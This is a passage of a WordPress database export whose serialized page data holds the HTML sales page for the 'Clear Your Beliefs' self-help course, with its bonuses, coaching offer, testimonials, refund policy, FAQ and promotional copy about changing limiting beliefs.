href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1918, 2215, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72882:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have 